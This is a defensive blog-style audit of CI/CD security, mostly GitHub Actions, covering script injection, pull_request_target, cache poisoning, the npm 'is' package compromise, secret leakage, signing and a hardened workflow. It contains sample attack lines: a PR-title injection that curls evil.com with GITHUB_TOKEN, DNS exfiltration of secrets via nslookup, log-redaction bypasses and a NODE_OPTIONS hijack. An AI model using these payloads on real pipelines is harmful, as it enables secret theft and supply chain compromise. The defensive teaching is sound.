Securing Your CI/CD Pipeline: A Systems Engineer's Audit
Your CI/CD pipeline has more attack surface than your application. It has your secrets, your signing keys, your deploy credentials, and it executes arbitrary code from the internet on every push. Here is a systems-level audit of every vector, with proof-of-concept demonstrations and a hardened workflow you can steal.
The uncomfortable truth: Most teams lock down their production servers and leave their CI/CD pipelines wide open. A compromised pipeline doesn't just leak secrets — it gives an attacker a signed, trusted path directly into production.
1. The Attack Surface
Before fixing anything, enumerate what you are defending. A modern CI/CD pipeline exposes at least seven distinct attack surfaces, each with its own threat model:
| Surface | What an Attacker Gets | Entry Vector |
|---|---|---|
| Dependencies | Arbitrary code execution at install time | Typosquatting, account takeover, malicious updates |
| Third-party actions/plugins | Full runner access, secret exfiltration | Compromised action repo, mutable tags |
| Workflow triggers | Code execution in privileged context | pull_request_target, issue_comment |
| Secrets & tokens | Cloud access, deploy keys, API tokens | Script injection, env var abuse, log exposure |
| Build cache | Persistent backdoor across builds | Cache key collision, poisoned artifacts |
| Artifacts | Tampered binaries shipped to users | Artifact substitution between jobs |
| Runner environment | Lateral movement, persistent compromise | Self-hosted runner escape, shared state |
Each of these surfaces is exploitable independently. A determined attacker will chain them. The sections that follow cover each one with concrete proof-of-concept demonstrations.
2. GitHub Actions Deep Dive
Building on Rafael Gonzaga's analysis of GitHub Actions security vectors, let's walk through the three most dangerous classes of vulnerability in GitHub Actions workflows.
Script injection via context expressions
GitHub Actions uses ${{ }} expressions to interpolate context values into workflow steps. When these expressions contain attacker-controlled input and are used in run: blocks, the result is direct shell injection. The dangerous fields include github.event.issue.title, github.event.pull_request.body, github.event.comment.body, and github.event.pull_request.head.ref.
# VULNERABLE: PR title is attacker-controlled and interpolated into shell name: Check PR Title on: pull_request jobs: check: runs-on: ubuntu-latest steps: - name: Validate title run: | title="${{ github.event.pull_request.title }}" # An attacker sets the PR title to: # a]"; curl http://evil.com/steal?t=$GITHUB_TOKEN # # Result: secret exfiltration via command injection
The fix is to never interpolate user-controlled context directly into run: blocks. Pass them through environment variables instead, which are not subject to shell expansion:
# SAFE: user input is passed as an environment variable, not interpolated steps: - name: Validate title env: PR_TITLE: ${{ github.event.pull_request.title }} run: | # $PR_TITLE is a shell variable now, not subject to injection if [[ ! "$PR_TITLE" =~ ^[A-Za-z]+:\ .+$ ]]; then echo "Invalid PR title format" exit 1 fi
The pull_request_target trap
The pull_request_target event is arguably the single most dangerous feature in GitHub Actions. Unlike pull_request, it runs in the context of the base branch, which means it has access to secrets and write permissions — even when triggered by a pull request from a fork. This is by design, but the implications are severe.
When a workflow triggered by pull_request_target checks out the PR's head code (as many do), it gives untrusted fork code access to the repository's secrets:
# DANGEROUS: pull_request_target + checkout of PR code = secret exposure on: pull_request_target jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 with: # This checks out the FORK's code, but secrets are available ref: ${{ github.event.pull_request.head.sha }} - run: npm install # fork's package.json runs arbitrary postinstall scripts - run: npm test # fork's test files can read ${{ secrets.DEPLOY_KEY }}
The safe pattern is to split this into two workflows. The first runs on pull_request (no secrets, no write access) and uploads results as artifacts. The second runs on workflow_run (has secrets) and consumes those artifacts after validation:
# Step 1: Run untrusted code in a sandboxed context name: PR Build on: pull_request jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - run: npm ci && npm test - uses: actions/upload-artifact@v4 with: name: test-results path: coverage/ # Step 2: Consume results in a privileged context name: PR Comment on: workflow_run: workflows: ["PR Build"] types: [completed] jobs: comment: runs-on: ubuntu-latest if: github.event.workflow_run.conclusion == 'success' steps: - uses: actions/download-artifact@v4 # Validate artifact contents before using them
TOCTOU: Time-of-Check to Time-of-Use
This is a race condition that affects approval-based workflows. A maintainer reviews a PR and applies a "safe to test" label. The workflow triggers. But between the label being applied and the workflow executing, the PR author pushes a new commit with malicious code. The workflow runs the new code under the old approval.
As Gonzaga documents, this affects both pull_request_target and issue_comment triggers. The critical detail: pull_request.head.ref is mutable — it resolves to whatever the branch points to at execution time, not at trigger time.
The mitigation is to always pin to the immutable commit SHA:
# VULNERABLE: head.ref resolves at execution time, not trigger time - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.ref }} # SAFE: head.sha is immutable — pinned to the reviewed commit - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }}
Environment variable injection
Several environment variables can hijack subsequent steps if an attacker can write to them. BASH_ENV is sourced before every bash step. NODE_OPTIONS can load arbitrary modules via --require. LD_PRELOAD injects shared libraries into every process. HTTPS_PROXY redirects all HTTPS traffic through an attacker-controlled proxy, enabling secret interception in transit.
If any workflow step writes to $GITHUB_ENV using untrusted input, all subsequent steps are compromised:
# If an earlier step writes attacker-controlled data to GITHUB_ENV: echo "NODE_OPTIONS=--require=/tmp/evil.js" >> $GITHUB_ENV # Every subsequent step that runs Node.js will execute evil.js first. # This includes actions written in JavaScript (most of them).
3. Supply Chain Attack: The "is" Package
As Sangchul Lee documented in his analysis of the npm "is" package supply chain attack, a single compromised utility package can expose the entire downstream ecosystem. This attack is a case study in how supply chain compromises actually work in practice, and why CI/CD pipelines are the primary blast radius.
The attack chain
The attack targeted maintainers of popular npm packages, including is, eslint-config-prettier, and chalk. The technique was a credential phishing campaign with surgical precision:
- Phishing: Maintainers received emails impersonating npm support from
support@npmjs.org, directing them tonpnjs(typosquatted domain) with tracking tokens in the URL to identify each target. - Token theft: The phishing page captured npm credentials. The attacker then created
automation-type tokens, which critically bypass 2FA requirements for publishing. - Malicious publish: The compromised
ispackage v5.0.0 was published to the official npm registry with a weaponizedpostinstallhook.
The payload
The injected code used multiple layers of obfuscation to evade static analysis:
// package.json — the entry point { "name": "is", "version": "5.0.0", "scripts": { "postinstall": "node index.js" // triggers on npm install } }
The index.js payload used the Function() constructor to dynamically generate and execute over 8,000 lines of obfuscated code in memory — avoiding filesystem writes that scanners would catch. Variable names were seeded with invisible Unicode characters (\u200C, zero-width non-joiner) to defeat grep-based detection. Variables named throw, require, and void with hidden characters made manual code review nearly impossible.
The deobfuscated payload performed the following:
- Credential harvesting: Read environment variables including
AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY,DATABASE_URL, and any variable matching common secret patterns - System fingerprinting: Collected hostname, username, platform, architecture, and current working directory
- Dependency mapping: Read
package.json, dependency trees, and npm scripts to identify high-value downstream targets - C2 channel: Established a WebSocket connection to attacker infrastructure for real-time data exfiltration and remote command execution
Why CI/CD is the blast radius
This is where CI/CD pipelines become the critical amplifier. When npm install runs in your CI pipeline, the postinstall hook executes with access to every secret and environment variable available to the runner. A developer's laptop might have limited credentials. Your CI runner has deploy keys, cloud provider tokens, package publishing tokens, and database credentials. The attack referenced by GHSA-8mgj-vmr8-frr6 demonstrates this pattern.
This is not theoretical. The is package had millions of downstream dependents. Every CI pipeline that ran npm install on a project depending on is@^4.0.0 (which semver-resolved to the malicious 5.0.0) executed the payload in a privileged context.
4. Cache Poisoning
GitHub Actions caches are scoped to a branch but accessible by child branches. The default branch's cache is accessible to all branches. This creates a poisoning vector: an attacker who can write to the cache from a PR branch can inject malicious content that persists across builds.
The attack
Consider a workflow that caches node_modules or compiled binaries. An attacker opens a PR that modifies package-lock.json in a way that produces the same cache key but includes a trojaned dependency. Alternatively, if the cache key is based on a hash of files the attacker can control, they craft a collision:
# Typical cache configuration - uses: actions/cache@v4 with: path: node_modules # Cache key is based on lockfile hash — attacker controls this key: node-${{ hashFiles('package-lock.json') }} # Attack: modify package-lock.json to resolve a dependency # to a registry the attacker controls, then revert the change # after the cache is populated. Subsequent builds use the # poisoned node_modules from cache.
Proof of concept: cache key manipulation
The more subtle attack targets restore keys. When an exact cache key miss occurs, GitHub Actions falls back to prefix-matched restore keys. An attacker can populate a cache entry with a carefully chosen key that matches a restore-key prefix used by the main branch:
# Main branch workflow uses: key: build-${{ hashFiles('src/**') }} restore-keys: | build- # Attacker's PR branch populates a cache entry with key "build-aaaa..." # which matches the restore-key prefix "build-". # If the PR branch cache is created before the main branch cache, # main branch builds will restore the poisoned cache.
Mitigations
- Scope caches tightly: Include
runner.os, exact Node/Python version, and a hash of lockfiles in the cache key - Never cache executable outputs: Cache dependencies, not compiled binaries. Rebuild from source in every CI run
- Use immutable caches: GitHub's cache is immutable once written (same key cannot be overwritten), but restore-key fallback undermines this. Minimize restore-key breadth
- Verify cache integrity: Checksum cached artifacts before using them
5. Secret Management: What Leaks and How
GitHub Actions redacts secrets from logs, but this redaction is best-effort, not guaranteed. There are multiple documented paths to secret exfiltration.
Exfiltration vectors
| Vector | Mechanism | Mitigation |
|---|---|---|
| Base64 encoding | echo $SECRET | base64 produces output the redactor does not match | Restrict GITHUB_TOKEN permissions per job |
| Character splitting | Print secret one character at a time; redactor only matches full strings | Use OIDC tokens instead of long-lived secrets |
| DNS exfiltration | nslookup $SECRET.evil.com sends the secret as a DNS subdomain query | Network egress controls on self-hosted runners |
| Artifact upload | Write secrets to a file, upload as build artifact | Never use secrets.* in artifact paths or content |
| Error messages | Secrets in command arguments appear in error output before redaction | Pass secrets via environment variables, not CLI args |
Proof of concept: log redaction bypass
# GitHub redacts exact matches of secrets in logs. # These transformations defeat redaction: # 1. Base64 encode echo "$SECRET" | base64 # Output: c2VjcmV0dmFsdWU= (not redacted) # 2. Hex encode echo "$SECRET" | xxd -p # Output: 736563726574... (not redacted) # 3. Reverse the string echo "$SECRET" | rev # Output: eulavterces (not redacted) # 4. DNS exfiltration — no log output at all nslookup "$SECRET.attacker-domain.com" # Secret transmitted via DNS query, no log trace
The GITHUB_TOKEN problem
By default, GITHUB_TOKEN has write access to the repository's contents, pull requests, issues, and packages. Most workflows need a small fraction of these permissions. Always restrict to minimum required scope:
# Lock down GITHUB_TOKEN at the workflow level permissions: contents: read pull-requests: read issues: none packages: none # Override per-job only where needed jobs: deploy: permissions: contents: read id-token: write # for OIDC
6. Platform Comparison: Security Models
GitHub Actions is the most popular CI/CD platform, but it is not the only option, and its security model has specific weaknesses that alternatives address differently. Here is a factual comparison of security-relevant features across three major platforms.
| Feature | GitHub Actions | GitLab CI | Buildkite |
|---|---|---|---|
| Fork PR secret access | Secrets hidden from forks by default, but pull_request_target bypasses this | Protected variables excluded from forks; merge request pipelines run in fork context | No fork concept; pipelines only run from trusted repos |
| Runner isolation | GitHub-hosted: ephemeral VMs. Self-hosted: persistent, shared state between jobs | Shared runners use Docker isolation. Can enforce tagged runners per project | Agent-based; supports ephemeral agents, Kubernetes pods, and locked-down AMIs |
| Secret scoping | Organization, repository, or environment-level. Environment secrets require approval rules | Group, project, or environment-level. Protected variables restricted to protected branches | Agent-level or pipeline-level. Secrets injected by agent, not stored in pipeline config |
| OIDC support | Native id-token permission for cloud provider auth without long-lived secrets | Native CI_JOB_JWT for cloud auth. Supports OIDC with AWS, GCP, Azure | Supported via plugins; less native than GitHub/GitLab |
| Immutable pipeline config | Workflows defined in repo; any committer can modify. Branch protection rules help but require careful setup | Pipeline config in repo but include: can reference locked templates from compliance repos | Pipeline config stored on Buildkite servers; repo contains .buildkite/ but agent config is separate |
| Audit logging | Enterprise plan only for detailed audit logs | Audit events available on Premium/Ultimate tiers | Full audit log on all plans |
Key architectural differences
GitHub Actions conflates pipeline definition and code in the same repository. Any contributor with write access can modify .github/workflows/. This means a compromised developer account or a malicious insider can alter the pipeline itself.
GitLab CI addresses this partially with include: templates. A security team can maintain a locked-down pipeline template in a separate repository, and project pipelines include it. Changes to the template require separate access controls.
Buildkite takes a fundamentally different approach: the pipeline definition lives on the Buildkite server, not in the repository. The agent pulls the pipeline steps from Buildkite's API, not from the repo. This means an attacker who compromises the source repo cannot modify the pipeline without also compromising the Buildkite account.
7. Signing & Provenance: The Defense Stack
Detection and prevention are necessary but insufficient. The final layer is cryptographic proof that what you built is what you ship, and that it was built by who you think built it.
SLSA (Supply-chain Levels for Software Artifacts)
SLSA defines four levels of supply chain integrity. Most organizations should target SLSA Level 3, which requires a hardened build platform that generates non-forgeable provenance:
| Level | Requirements | What It Proves |
|---|---|---|
| SLSA 1 | Build process is documented | Origin of the package is recorded |
| SLSA 2 | Version-controlled build definition, hosted build service | Build was not modified after check-in |
| SLSA 3 | Hardened build platform, non-forgeable provenance | Build is tamper-resistant; provenance is cryptographically verified |
| SLSA 4 | Two-party review, hermetic builds | No insider threat; build is fully reproducible |
Sigstore: Keyless signing for CI/CD
Sigstore eliminates the key management problem. Instead of managing long-lived signing keys (which become another secret to protect), it uses OIDC identity from your CI provider to issue short-lived certificates via the Fulcio certificate authority. Signatures are recorded in the Rekor transparency log for public auditability.
# Sign a container image in GitHub Actions using Sigstore cosign jobs: sign: runs-on: ubuntu-latest permissions: id-token: write # required for OIDC token packages: write # required to push signature steps: - uses: sigstore/cosign-installer@v3 - run: | cosign sign --yes \ ghcr.io/myorg/myimage@${{ steps.build.outputs.digest }} # No keys to manage. OIDC identity from GitHub Actions # is used to obtain a short-lived Fulcio certificate. # The signature is recorded in the Rekor transparency log.
npm provenance
Since npm v9.5.0, packages can be published with provenance statements that cryptographically link a published package to its source repository and build workflow. This directly addresses the attack vector demonstrated in the is package compromise:
# Publish with provenance — links the package to its source commit and workflow steps: - run: npm publish --provenance env: NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }} # Consumers can verify provenance: # npm audit signatures # This verifies the package was built from the claimed source repo # and the claimed CI workflow — not from an attacker's laptop.
8. Hardened Pipeline Template
Below is a complete GitHub Actions workflow that implements every mitigation discussed in this post. Copy it, adapt it to your stack, and use it as a baseline.
# .github/workflows/ci-hardened.yml # Hardened CI pipeline — every mitigation in one place name: CI (Hardened) on: push: branches: [main] pull_request: branches: [main] # 1. Restrict GITHUB_TOKEN to minimum permissions at workflow level permissions: contents: read jobs: build: runs-on: ubuntu-latest timeout-minutes: 15 # 2. Prevent runaway jobs (crypto miners, etc.) steps: # 3. Pin actions to full commit SHAs, not mutable tags - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 with: persist-credentials: false # 4. Don't leave git credentials on disk - uses: actions/setup-node@39370e3970a6d050c480ffad4ff0ed4d3fdee5af # v4.1.0 with: node-version: '22' # 5. Use npm ci, not npm install — respects lockfile exactly, # skips lifecycle scripts from dependencies by default - run: npm ci --ignore-scripts # 6. Run lifecycle scripts only for your own package - run: npm rebuild # 7. Audit dependencies for known vulnerabilities - run: npm audit --audit-level=high # 8. Run tests - run: npm test # 9. Upload artifacts with minimal retention - uses: actions/upload-artifact@b4b15b8c7c6ac21ea08fcf65892d2ee8f75cf882 # v4.4.3 if: always() with: name: test-results path: coverage/ retention-days: 5 deploy: needs: build runs-on: ubuntu-latest if: github.ref == 'refs/heads/main' timeout-minutes: 10 # 10. Use environment with required reviewers for production deploy environment: production # 11. Per-job permissions — only what deploy needs permissions: contents: read id-token: write # 12. OIDC for cloud auth — no long-lived secrets steps: - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 with: persist-credentials: false # 13. Authenticate via OIDC, not stored credentials - uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502 # v4.0.2 with: role-to-assume: arn:aws:iam::123456789:role/deploy aws-region: us-east-1 - run: ./scripts/deploy.sh
The numbered comments correspond to specific mitigations. Every line has a reason. If you remove a line, know which threat you are accepting.
9. Takeaways: Prioritized Checklist
In order of impact and ease of implementation:
- Pin all actions to commit SHAs — a mutable tag (
@v4) can be force-pushed by a compromised action maintainer. A commit SHA is immutable. This is the single highest-leverage change you can make. - Set
permissions:at the workflow level — default tocontents: readand override per-job. This limits blast radius if any step is compromised. - Never interpolate user input into
run:blocks — use environment variables. This eliminates the entire class of script injection attacks. - Replace
pull_request_targetwithpull_request+workflow_run— if you must usepull_request_target, never check out the PR's code. - Use
npm ci --ignore-scripts— postinstall hooks are the primary delivery mechanism for npm supply chain attacks. Runnpm rebuildseparately for your own packages. - Adopt OIDC for cloud authentication — eliminate long-lived cloud credentials from your CI secrets entirely.
- Pin to
head.sha, neverhead.ref— close the TOCTOU window on approval-based workflows. - Audit your dependency tree — run
npm auditin CI, block merges on high-severity findings, and require npm provenance on published packages. - Sign your artifacts — use Sigstore/cosign for container images and
npm publish --provenancefor packages. Make provenance verification part of your deployment pipeline. - Set job timeouts — a compromised runner running a crypto miner will run until the 6-hour default. Set
timeout-minutesto the minimum your job needs.
Security is not a feature you ship once. It is a property of the system that degrades every time you add a dependency, a contributor, or a workflow step. Audit continuously. Assume compromise. Verify everything.
Sources & Further Reading
- Rafael Gonzaga, "Securing Your Github Actions" — comprehensive analysis of GitHub Actions attack vectors including script injection, TOCTOU, and
pull_request_targetexploits - Sangchul Lee (1ilsang), "is 패키지의 Supply Chain Attack 과정 분석" — detailed technical analysis of the npm
ispackage supply chain compromise, including obfuscation techniques and payload analysis - GitHub Security Advisory GHSA-8mgj-vmr8-frr6
- SLSA Framework, slsa.dev/spec/v1.0 — Supply-chain Levels for Software Artifacts specification
- Sigstore, docs.sigstore.dev — keyless signing for software supply chain integrity
- GitHub Docs, "Security hardening for GitHub Actions"
- npm Documentation, "Generating provenance statements"